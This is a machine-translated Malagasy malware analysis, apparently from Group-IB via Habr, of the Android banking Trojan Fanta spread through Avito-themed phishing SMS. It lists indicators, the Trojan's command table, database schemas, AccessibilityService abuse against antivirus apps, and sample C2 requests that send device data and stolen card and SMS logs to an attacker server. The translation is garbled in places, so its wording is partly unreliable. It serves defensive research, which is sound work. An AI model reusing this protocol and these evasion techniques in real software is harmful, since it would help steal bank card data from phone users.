Indray andro ianao te hivarotra zavatra ao amin'ny Avito ary, rehefa namoaka ny famaritana amin'ny antsipiriany momba ny vokatrao (ohatra, ny maody RAM), dia hahazo ity hafatra ity ianao:
Raha vantany vao tsindrio ny bokotra "Continue", dia alaina amin'ny fitaovana Android anao ny rakitra APK misy kisary sy anarana mahatoky. Nametraka fampiharana ianao izay nangataka zo AccessibilityService noho ny antony iray, dia nisy varavarankely roa nipoitra ary nanjavona haingana ary... Dia izay.
Mandeha manara-maso ny fifandanjanao ianao, saingy noho ny antony sasany dia manontany ny antsipirian'ny karatrao indray ny fampiharana banky anao. Rehefa avy niditra ny angon-drakitra dia misy zavatra mahatsiravina mitranga: noho ny antony mbola tsy mazava aminao, manomboka manjavona ny vola ao amin'ny kaontinao. Miezaka mamaha ny olana ianao, saingy manohitra ny findainao: manindry ny fanalahidy "Back" sy "Home", tsy maty ary tsy mamela anao hampihetsika ny fepetra fiarovana. Vokany, tavela tsy misy vola ianao, tsy voavidy ny entanao, very hevitra ianao ary manontany tena hoe: inona no nitranga?
Tsotra ny valiny: lasa niharan'ny Android Trojan Fanta ianao, mpikambana ao amin'ny fianakaviana Flexnet. Ahoana no nahatonga izany? Andao hazavaina izao.
Ireo mpanoratra: Andrey Polovinkin, manampahaizana zandriny amin'ny famakafakana malware, Ivan Pisarev, manampahaizana manokana amin'ny famakafakana malware.
Statistika sasany
Ny fianakaviana Flexnet an'ny Android Trojans dia fantatra voalohany tamin'ny taona 2015. Nandritra ny fe-potoana lava be, ny fianakaviana dia niitatra ho subspecies maromaro: Fanta, Limebot, Lipton, sns. Ny Trojan, ary koa ny fotodrafitrasa mifandraika amin'izany, dia tsy mijanona: misy rafitra fitsinjarana mahomby vaovao - amin'ny tranga misy antsika, pejy phishing avo lenta mikendry mpivarotra manokana, ary ny mpamorona Trojan dia manaraka ny fironana lamaody amin'ny fanoratana virus - manampy fiasa vaovao ahafahana mangalatra vola amin'ny fomba mahomby kokoa amin'ny fitaovana voan'ny aretina sy ny mekanika fiarovana.
Ny fanentanana voalaza ato amin'ity lahatsoratra ity dia natao ho an'ireo mpampiasa avy any Rosia; vitsy ny fitaovana voarakitra ao Okraina, ary vitsy kokoa aza any Kazakhstan sy Belarosia.
Na dia efa tao amin'ny kianja Android Trojan nandritra ny 4 taona mahery izao aza ny Flexnet ary efa nodinihin'ny mpikaroka maro amin'ny antsipiriany, dia mbola ao anatin'ny endriny tsara izy io. Nanomboka tamin'ny Janoary 2019, mihoatra ny 35 tapitrisa robla ny mety ho fahasimbana - ary natao ho an'ny fampielezan-kevitra any Rosia ihany izany. Tamin'ny taona 2015 dia namidy tamin'ny forum ambanin'ny tany ny dikan-teny isan-karazany amin'ity Trojan Android ity, izay ahitana ny loharano loharanon'ny Trojan misy famaritana amin'ny antsipiriany ihany koa. Midika izany fa ny antontan'isa momba ny fahasimbana eo amin'izao tontolo izao dia mbola mahavariana kokoa. Tsy famantarana ratsy ho an'ny antitra toy izany, sa tsy izany?
Hatramin'ny fivarotana ka hatramin'ny fitaka
Araka ny hita tamin'ny pikantsary naseho teo aloha momba ny pejy phishing ho an'ny serivisy Internet amin'ny fandefasana doka Avito, dia nomanina ho an'ny niharam-boina manokana izany. Toa mampiasa ny iray amin'ireo mpizara Avito ireo mpanafika, izay maka ny laharan-telefaona sy ny anaran'ny mpivarotra, ary koa ny famaritana ny vokatra. Aorian'ny fanitarana ny pejy sy ny fanomanana ny rakitra APK dia alefa SMS miaraka amin'ny anarany sy rohy mankany amin'ny pejy phishing misy famaritana ny vokatra sy ny vola azo avy amin'ny "fivarotana" ny vokatra ilay niharam-boina. Amin'ny fipihana ny bokotra, ny mpampiasa dia mahazo rakitra APK ratsy - Fanta.
Ny fanadihadiana momba ny sehatra shcet491[.]ru dia nampiseho fa natolotra ho an'ny mpizara DNS Hostinger izany:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Ny fisie domain zone dia misy fidirana manondro ny adiresy IP 31.220.23[.]236, 31.220.23[.]243, ary 31.220.23[.]235. Na izany aza, manondro ny lohamilina misy adiresy IP 178.132.1[.]240 ny rakitra loharanon-karena voalohany an'ny sehatra (Rakitra iray).
Ny adiresy IP 178.132.1[.]240 dia any Holandy ary an'ny mpampiantrano azy WorldStream. Ny adiresy IP 31.220.23[.]235, 31.220.23[.]236 ary 31.220.23[.]243 dia hita any UK ary an'ny mpizara fampiantranoana iombonana HOSTINGER. Ampiasaina ho firaketana openprov-ru. Namaha ny adiresy IP 178.132.1[.]240 ihany koa ireto sehatra manaraka ireto:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Marihina fa ny rohy amin'ity endrika manaraka ity dia saika azo avy amin'ny sehatra rehetra:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ity môdely ity dia misy rohy avy amin'ny hafatra SMS ihany koa. Araka ny angon-drakitra ara-tantara, dia hita fa ny sehatra iray dia mifanandrify amin'ny rohy maromaro ao amin'ny lamina voalaza etsy ambony, izay manondro fa ny sehatra iray dia nampiasaina mba hizarana ny Trojan amin'ireo niharam-boina maromaro.
Andao hitsambikina kely: ny Trojan alaina amin'ny alàlan'ny rohy avy amin'ny SMS dia mampiasa ny adiresy ho mpizara fanaraha-maso onusedseddohap[.]club. Ity sehatra ity dia voasoratra tamin'ny 2019-03-12, ary nanomboka tamin'ny 2019-04-29, nifanerasera tamin'ity sehatra ity ny fampiharana APK. Miorina amin'ny angona azo avy amin'ny VirusTotal, fampiharana 109 no nifanerasera tamin'ity mpizara ity. Ny sehatra mihitsy no namaha ny adiresy IP 217.23.14[.]27, any Holandy ary tompon'ny mpampiantrano WorldStream. Ampiasaina ho firaketana namecheap. Namaha ity adiresy IP ity ihany koa ny sehatra klioba bad-racoon[.]. (manomboka ny 2018-09-25) ary bad-racoon[.]live (manomboka ny 2018-10-25). Miaraka amin'ny sehatra klioba bad-racoon[.]. mihoatra ny 80 APK rakitra nifanerasera tamin'ny bad-racoon[.]live - mihoatra ny 100.
Amin'ny ankapobeny, ny fanafihana dia toy izao manaraka izao:
Inona no ao ambanin'ny saron'i Fanta?
Tahaka ny Android Trojans maro hafa, ny Fanta dia afaka mamaky sy mandefa hafatra SMS, manao fangatahana USSD, ary mampiseho ny varavarankely ao an-tampon'ny rindranasa (anisan'izany ny banky). Na izany aza, tonga ny arsenal ny fiasan'ity fianakaviana ity: nanomboka nampiasa ny Fanta AccessibilityService ho an'ny tanjona isan-karazany: mamaky ny votoatin'ny fampandrenesana avy amin'ny rindranasa hafa, manakana ny fisavana sy ny fampitsaharana ny famonoana Trojan amin'ny fitaovana voan'ny aretina, sns. Fanta dia miasa amin'ny dikan-teny Android rehetra tsy latsaky ny 4.4. Amin'ity lahatsoratra ity dia hojerentsika akaiky ity santionany Fanta manaraka ity:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Avy hatrany aorian'ny fandefasana
Avy hatrany aorian'ny fandefasana dia manafina ny kisary ny Trojan. Ny fampiharana dia tsy afaka miasa raha tsy ao anaty lisitra ny anaran'ilay fitaovana voa:
- android_x86
- VirtualBox
- Nexus 5X (omby)
- Nexus 5 (hareza)
Ity fanamarinana ity dia atao amin'ny serivisy lehibe amin'ny Trojan - MainService. Rehefa natomboka voalohany, ny mari-pamantarana fanamafisam-peo an'ny rindranasa dia atomboka amin'ny soatoavina default (ny endrika fitehirizana angon-drakitra fanamafisana sy ny dikany dia horesahina any aoriana), ary misy fitaovana vaovao voarakitra ao amin'ny mpizara fanaraha-maso. Ny fangatahana HTTP POST miaraka amin'ny karazana hafatra dia halefa any amin'ny mpizara register_bot ary fampahalalana momba ny fitaovana voan'ny aretina (dika Android, IMEI, nomeraon-telefaona, anaran'ny mpandraharaha ary kaody firenena izay nisoratra anarana ny mpandraharaha). Ny adiresy dia miasa ho mpizara fanaraha-maso hXXp://onuseseddohap[.]club/controller.php. Ho setrin'izany dia mandefa hafatra misy ireo saha ny mpizara bot_id, bot_pwd, mpizara - ny fampiharana dia mitahiry ireo soatoavina ireo ho mari-pamantarana ny mpizara CnC. fikirana mpizara azo atao raha tsy voaray ny saha: Mampiasa ny adiresy fisoratana anarana i Fanta - hXXp://onuseseddohap[.]club/controller.php. Ny fiasan'ny fanovana ny adiresin'ny CnC dia azo ampiasaina hamahana olana roa: ny fizarana ny enta-mavesatra eo amin'ny mpizara maromaro (raha misy fitaovana marobe marobe, ny enta-mavesatra amin'ny mpizara tranonkala iray tsy voafehy dia mety ho ambony), ary koa ny fampiasana. mpizara hafa raha sendra ny tsy fahombiazan'ny iray amin'ireo mpizara CnC.
Raha misy hadisoana mitranga eo am-pandefasana ny fangatahana, dia hamerina ny fizotry ny fisoratana anarana ny Trojan rehefa afaka 20 segondra.
Raha vantany vao voarakitra soa aman-tsara ilay fitaovana, dia hampiseho ity hafatra manaraka ity amin'ny mpampiasa i Fanta:
Fanamarihana manan-danja: ny serivisy antsoina Fiarovana ny rafitra - ny anaran'ny serivisy Trojan, ary rehefa avy manindry ny bokotra OK Hisy varavarankely hisokatra miaraka amin'ny firafitry ny Accessibility an'ny fitaovana voan'ny aretina, izay tsy maintsy omen'ny mpampiasa ny zon'ny Accessibility ho an'ny serivisy ratsy:
Raha vao mihodina ny mpampiasa AccessibilityService, Fanta dia mahazo miditra amin'ny votoatin'ny fikandrana fampiharana sy ny hetsika atao ao aminy:
Vantany vao nahazo ny zon'ny fidirana, ny Trojan dia mangataka zon'ny mpitantana sy zo hamaky fampandrenesana:
Amin'ny fampiasana ny AccessibilityService, ny fampiharana dia manao simulate ny fanendry fanalahidy, ka manome azy ny zo ilaina rehetra.
Ny Fanta dia mamorona tranga angon-drakitra marobe (izay holazaina any aoriana) ilaina amin'ny fitahirizana angon-drakitra fikirakirana, ary koa ny fampahalalana nangonina nandritra ny dingana momba ilay fitaovana voan'ny aretina. Mba handefasana ny vaovao voaangona, ny Trojan dia mamorona asa miverimberina natao hisintonana saha avy amin'ny angon-drakitra ary handray baiko avy amin'ny mpizara fanaraha-maso. Ny elanelam-potoana hidirana amin'ny CnC dia apetraka miankina amin'ny dikan-Android: amin'ny tranga 5.1, ny elanelana dia ho 10 segondra, raha tsy izany dia 60 segondra.
Mba hahazoana ny baiko dia manao fangatahana i Fanta GetTask mankany amin'ny mpizara fitantanana. Ho setrin'izany dia afaka mandefa ny iray amin'ireto baiko manaraka ireto ny CnC:
ekipa | famaritana |
---|---|
0 | Mandefasa hafatra SMS |
1 | Manaova antso an-telefaona na baiko USSD |
2 | Manavao paramètre elanelana |
3 | Manavao paramètre manakana |
6 | Manavao paramètre smsManager |
9 | Manomboka manangona hafatra SMS |
11 | Avereno amin'ny firafitry ny orinasa ny findainao |
12 | Alefaso/Atsaharo ny fanoratana ny famoronana boaty fifampiresahana |
Ny Fanta koa dia manangona fampandrenesana avy amin'ny fampiharana banky 70, rafitra fandoavam-bola haingana ary e-wallet ary mitahiry izany ao anaty tahiry.
Fitehirizana masontsivana config
Mba hitahiry ny mari-pamantarana fanamafisana, mampiasa fomba fiasa mahazatra ho an'ny sehatra Android i Fanta - safidinao- rakitra. Ny fandrindrana dia ho voatahiry amin'ny rakitra iray nomena anarana Fikirana. Ny famaritana ny masontsivana voatahiry dia eo amin'ny tabilao etsy ambany.
anarana | Sanda default | Soatoavina azo atao | famaritana |
---|---|---|---|
id | 0 | Integer | Bot ID |
mpizara | hXXp://onuseseddohap[.]club/ | URL | Mifehy ny adiresin'ny mpizara |
pwd | - | String | Tenimiafina mpizara |
elanelana | 20 | Integer | Elanelanelan'ny fotoana. Manondro hoe hafiriana no tokony hanemorana ireto asa manaraka ireto:
|
manakana | rehetra | rehetra/telNumber | Raha mitovy amin'ny tady ny saha rehetra na telNumber, dia ho voasambotry ny fampiharana ny hafatra SMS voaray fa tsy aseho amin'ny mpampiasa |
smsManager | 0 | 0/1 | Alefaso / esory ny fampiharana amin'ny maha-mpahazo SMS default |
readDialog | diso | Marina/diso | Alefaso/Atsaharo ny firaketana hetsika AccessibilityEvent |
Fanta koa dia mampiasa ny rakitra smsManager:
anarana | Sanda default | Soatoavina azo atao | famaritana |
---|---|---|---|
pckg | - | String | Anaran'ny mpitantana hafatra SMS ampiasaina |
Fifandraisana amin'ny angon-drakitra
Mandritra ny asany dia mampiasa tahiry roa ny Trojan. Database nomena a ampiasaina hitehirizana vaovao isan-karazany voaangona avy amin'ny finday. Ny angon-drakitra faharoa dia nomena anarana fanta.db ary ampiasaina hitahiry ny toe-javatra tompon'andraikitra amin'ny famoronana fikandrana fikandrana natao hanangonana vaovao momba ny karatra banky.
Trojan dia mampiasa database а mba hitahiry ny vaovao voaangona sy hanoratana ny hetsikao. Ny angona dia voatahiry ao anaty latabatra hazo. Mba hamoronana latabatra dia ampiasao ity fangatahana SQL manaraka ity:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
Ny tahiry dia ahitana ireto fampahalalana manaraka ireto:
1. Manoratra ny fanombohana ny fitaovana voan'ny aretina miaraka amin'ny hafatra Nandeha ny finday!
2. Fampandrenesana avy amin'ny fampiharana. Ny hafatra dia noforonina araka ity môdely manaraka ity:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Ny angona amin'ny karatra banky avy amin'ny endrika phishing noforonin'ny Trojan. fikirana VIEW_NAME mety ho iray amin'ireto manaraka ireto:
- AliExpress
- Avito
- Google Play
- Miscellaneous <%App Name%>
Ny hafatra dia misoratra amin'ny endrika:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Hafatra SMS miditra/mivoaka amin'ny endrika:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Fampahalalana momba ny fonosana izay mamorona ny boaty fifampiresahana amin'ny endrika:
(<%Package name%>)<%Package information%>
Ohatra latabatra hazo:
Iray amin'ny fiasan'ny Fanta ny fanangonana vaovao momba ny karatra banky. Ny fanangonana angon-drakitra dia mitranga amin'ny famoronana varavarankely phishing rehefa manokatra fampiharana banky. Ny Trojan dia mamorona varavarankely phishing indray mandeha monja. Voatahiry ao anaty latabatra ny fampahalalana izay naseho tamin'ny mpampiasa ny varavarankely Fikirana ao amin'ny tahiry fanta.db. Mba hamoronana angon-drakitra dia ampiasao ity fangatahana SQL manaraka ity:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Sahan-databatra rehetra Fikirana amin'ny alàlan'ny default dia natomboka ho 1 (mamorona varavarankely phishing). Aorian'ny fidiran'ny mpampiasa ny angonany dia apetraka amin'ny 0 ny sandany. Ohatra amin'ny saha latabatra Fikirana:
- can_login - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra fangatahana banky
- first_bank - tsy ampiasaina
- can_avito - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra ny fampiharana Avito
- can_ali - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra ny fampiharana Aliexpress
- afaka_hafa - Ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra fampiharana avy amin'ny lisitra: Yula, Pandao, Drom Auto, Wallet. Karatra fihenam-bidy sy bonus, Aviasales, Famandrihana, Trivago
- can_card - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra Google Play
Fifandraisana amin'ny mpizara fitantanana
Ny fifandraisana amin'ny tambajotra amin'ny mpizara fitantanana dia mitranga amin'ny alàlan'ny protocol HTTP. Mba hiasa amin'ny tambajotra dia mampiasa ny tranomboky Retrofit malaza i Fanta. Ny fangatahana dia alefa amin'ny: hXXp://onuseseddohap[.]club/controller.php. Ny adiresin'ny mpizara dia azo ovaina rehefa misoratra anarana amin'ny mpizara. Ny cookies dia azo alefa ho valin'ny server. Fanta dia manao ireto fangatahana manaraka ireto amin'ny mpizara:
- Ny fisoratana anarana amin'ny bot amin'ny mpizara fanaraha-maso dia mitranga indray mandeha, amin'ny fandefasana voalohany. Ireto angon-drakitra manaraka ireto momba ny fitaovana voan'ny aretina dia alefa any amin'ny mpizara:
· Cookie - cookies azo avy amin'ny mpizara (ny sanda tsy misy dikany dia tady foana)
· maody — tady tsy miova register_bot
· tovona - tsy miova integer 2
· version_sdk - dia miforona araka ity môdely manaraka ity: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI amin'ny fitaovana voan'ny aretina
· firenena — kaodin'ny firenena nisoratra anarana ny mpandraharaha, amin'ny endrika ISO
· isa - nomeraon-telefaona
· mpandraharaha - anaran'ny mpandraharahaOhatra amin'ny fangatahana nalefa tany amin'ny mpizara:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
Ho setrin'ny fangatahana, ny mpizara dia tsy maintsy mamerina zavatra JSON misy ireto marika manaraka ireto:
· bot_id - ID ny fitaovana voan'ny aretina. Raha mitovy amin'ny 0 ny bot_id dia hanatanteraka indray ny fangatahana ny Fanta.
bot_pwd - tenimiafina ho an'ny mpizara.
mpizara — mifehy ny adiresy mpizara. Parameter azo atao. Raha tsy voafaritra ny mari-pamantarana dia ny adiresy voatahiry ao amin'ny fampiharana no hampiasaina.Ohatra JSON object:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Mangataka ny handray baiko avy amin'ny mpizara. Ireto angona manaraka ireto dia alefa any amin'ny mpizara:
· Cookie — cookies azo avy amin'ny mpizara
· dia asao - ID ny fitaovana voaray rehefa mandefa ny fangatahana register_bot
· pwd - tenimiafina ho an'ny mpizara
· divice_admin - ny saha no mamaritra raha efa azo ny zon'ny mpitantana. Raha azo ny zon'ny mpitantana dia mitovy ny saha 1, raha tsy izany 0
· Accessibility - Satan'ny asa fanompoana Accessibility. Raha nanomboka ny serivisy dia ny sandany 1, raha tsy izany 0
· SMSManager — mampiseho raha alefa ny Trojan ho toy ny fampiharana default amin'ny fandraisana SMS
· efijery - mampiseho ny toetry ny efijery. Hapetraka ny sandany 1, raha mandeha ny efijery, raha tsy izany 0;Ohatra amin'ny fangatahana nalefa tany amin'ny mpizara:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Miankina amin'ny baiko, ny mpizara dia afaka mamerina zavatra JSON miaraka amin'ny mari-pamantarana samihafa:
· ekipa Mandefasa hafatra SMS: Ny masontsivana dia ahitana ny laharan-telefaona, ny lahatsoratry ny hafatra SMS ary ny ID ny hafatra alefa. Ny famantarana dia ampiasaina rehefa mandefa hafatra amin'ny mpizara misy karazana setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· ekipa Manaova antso an-telefaona na baiko USSD: Ny nomeraon-telefaonina na baiko dia tonga ao amin'ny vata famaliana.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· ekipa Hanova ny mari-pamantarana elanelana.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· ekipa Hanova ny paramètre intercept.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· ekipa Hanova ny saha SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· ekipa Manangona hafatra SMS avy amin'ny fitaovana voa.
{ "response": [ { "mode": 9 } ], "status":"ok" }
· ekipa Avereno amin'ny firafitry ny orinasa ny findainao:
{ "response": [ { "mode": 11 } ], "status":"ok" }
· ekipa Hanova ny parameter ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Mandefa hafatra misy karazana setSmsStatus. Ity fangatahana ity dia atao rehefa vita ny baiko Mandefasa hafatra SMS. Toy izao ny fangatahana:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Mampakatra ny votoatin'ny angon-drakitra. Andalana iray no alefa isaky ny fangatahana. Ireto angona manaraka ireto dia alefa any amin'ny mpizara:
· Cookie — cookies azo avy amin'ny mpizara
· maody — tady tsy miova setSaveInboxSms
· dia asao - ID ny fitaovana voaray rehefa mandefa ny fangatahana register_bot
· lahatsoratra - lahatsoratra ao amin'ny firaketana angon-drakitra ankehitriny (field d avy amin'ny latabatra hazo ao amin'ny tahiry а)
· isa - anaran'ny rakitra angona ankehitriny (field p avy amin'ny latabatra hazo ao amin'ny tahiry а)
· sms_mode - sanda integer (saha m avy amin'ny latabatra hazo ao amin'ny tahiry а)Toy izao ny fangatahana:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Raha azo alefa any amin'ny mpizara dia ho voafafa tsy ho eo amin'ny latabatra ny laharana. Ohatra amin'ny zavatra JSON naverin'ny mpizara:
{ "response":[], "status":"ok" }
Fifandraisana amin'ny AccessibilityService
Ny AccessibilityService dia nampiharina mba hanamora ny fampiasana ny fitaovana Android ho an'ny olona manana fahasembanana. Amin'ny ankamaroan'ny toe-javatra, ny fifandraisana ara-batana dia ilaina mba hifaneraserana amin'ny fampiharana. AccessibilityService dia ahafahanao manao azy ireo amin'ny programa. Mampiasa ny serivisy ny Fanta hamorona varavarankely hosoka amin'ny rindranasa banky ary manakana ny mpampiasa tsy hanokatra ny rafitra sy ny rindranasa sasany.
Amin'ny fampiasana ny fiasan'ny AccessibilityService, ny Trojan dia manara-maso ny fiovan'ny singa eo amin'ny efijery ny fitaovana voan'ny aretina. Araka ny efa voalaza teo aloha, ny firafitry ny Fanta dia misy masontsivana iray tompon'andraikitra amin'ny hetsika fanoratana miaraka amin'ny boaty fifampiresahana - readDialog. Raha apetraka io mari-pamantarana io, dia ampiana ao amin'ny angon-drakitra ny fampahalalana momba ny anarana sy ny famaritana ny fonosana nahatonga ny hetsika. Ny Trojan dia manao ireto hetsika manaraka ireto rehefa misy hetsika:
- Simulates fanerena ny lamosina sy ny fanalahidin'ny trano amin'ireto tranga manaraka ireto:
· raha te hamerina ny fitaovany ny mpampiasa
· raha te-hamafa ny fampiharana "Avito" na hanova ny zo fidirana ny mpampiasa
· raha misy filazana ny fampiharana "Avito" ao amin'ny pejy
· rehefa manokatra ny fampiharana Google Play Protect
· rehefa manokatra pejy misy fika AccessibilityService
· rehefa miseho ny boaty fifanakalozan-kevitra System Security
· rehefa manokatra ny pejy miaraka amin'ny firafitry ny "Draw over other app".
· rehefa manokatra ny pejy "Applications", "Recovery and reset", "Data reset", "Reset Settings", "Developer panel", "Special. fahafahana”, “Zo manokana”, “Zo manokana”
· raha ny fampiharana sasany no namorona ny hetsika.Lisitry ny fampiharana
- Android
- Master Lite
- Tompony madio
- Clean Master ho an'ny CPU x86
- Fitantanana fahazoan-dàlana amin'ny fampiharana Meizu
- MIUI Security
- Clean Master - Antivirus & Cache ary mpanadio fako
- Fifehezan'ny ray aman-dreny sy GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & fiarovana maimaim-poana 2019
- Mobile Security MegaFon
- AVG Protection ho an'ny Xperia
- Mobile Security
- Malwarebytes antivirus & fiarovana
- Antivirus ho an'ny Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- Antivirus AVG ho an'ny Huawei Tablet System Manager
- Samsung Accessibility
- Samsung Smart Manager
- Mpitarika fiarovana
- Speed Booster
- dr.web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus sy fiarovana amin'ny finday
- Kaspersky Internet Security: Antivirus sy fiarovana
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - fiarovana sy fitantanana
- AVG Antivirus maimaim-poana 2019 - Fiarovana ho an'ny Android
- Android Antivirus
- Norton Mobile Security sy Antivirus
- Antivirus, firewall, VPN, fiarovana finday
- Fiarovana amin'ny finday: antivirus, VPN, fiarovana amin'ny halatra
- Antivirus ho an'ny Android
- Raha mangataka alalana amin'ny fandefasana hafatra SMS amin'ny isa fohy, ny Fanta dia manao simulate ny manindry ny boaty Tsarovy ny safidy ary bokotra Send.
- Rehefa manandrana manaisotra ny zon'ny mpitantana amin'ny Trojan ianao dia manidy ny efijery finday.
- Manakana ny fampidirana mpitantana vaovao.
- Raha ny fampiharana antivirus dr.web nahita fandrahonana, maka tahaka ny fanerena ny bokotra i Fanta tsinontsinona.
- Ny Trojan dia manindry ny bokotra aoriana sy an-trano raha noforonin'ny fampiharana ilay hetsika Samsung Device Care.
- Fanta dia mamorona fikandrana phishing miaraka amin'ny endrika fampidirana vaovao momba ny karatra banky raha misy fampiharana avy amin'ny lisitry ny serivisy Internet 30 eo ho eo no natomboka. Anisan'izany: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, sns.
Forms phishing
Fanta dia manadihady izay fampiharana mandeha amin'ny fitaovana voan'ny aretina. Raha nosokafana ny fampiharana mahaliana iray, ny Trojan dia mampiseho varavarankely phishing eo ambonin'ny hafa rehetra, izay endrika fampidirana fampahalalana momba ny karatra banky. Ny mpampiasa dia tsy maintsy mampiditra ireto data manaraka ireto:
- Nomeraon-karatra
- Daty lany ny karatra
- CVV
- Anaran'ny tompon'ny karatra (tsy ho an'ny banky rehetra)
Miankina amin'ny fampiharana mandeha dia hiseho ny varavarankely phishing samihafa. Ireto ambany ireto ny ohatra amin'ny sasany amin'izy ireo:
AliExpress:
Avito:
Ho an'ny fampiharana hafa sasany, oh. Google Play Market, Aviasales, Pandao, Famandrihana, Trivago:
Ahoana tokoa moa izany
Soa ihany fa nivadika ho manam-pahaizana manokana momba ny fiarovana an-tserasera ilay olona nahazo ny hafatra SMS voalaza tany am-piandohan'ny lahatsoratra. Noho izany, tsy mitovy amin'ilay voalaza teo aloha ny tena dikan-teny tsy misy tale: nahazo SMS mahaliana ny olona iray, ary avy eo dia nomeny ny ekipan'ny Group-IB Threat Hunting Intelligence. Ny vokatry ny fanafihana dia ity lahatsoratra ity. Famaranana mahafinaritra, sa tsy izany? Na izany aza, tsy ny tantara rehetra dia mifarana amin'ny fomba mahomby, ary mba tsy ho toy ny fanapahan-kevitry ny tale miaraka amin'ny fahaverezan'ny vola ny anao, amin'ny ankamaroan'ny toe-javatra dia ampy ny manaraka ireto fitsipika efa ela ireto:
- aza mametraka rindranasa ho an'ny fitaovana finday misy Android OS avy amin'ny loharano hafa ankoatra ny Google Play
- Rehefa mametraka fampiharana dia tandremo manokana ny zo nangatahan'ny fampiharana
- tandremo ny fanitarana ny rakitra alaina
- apetraho tsy tapaka ny fanavaozana OS Android
- aza mitsidika loharano mampiahiahy ary aza misintona rakitra avy any
- Aza tsindrio ny rohy voaray amin'ny hafatra SMS.
Source: www.habr.com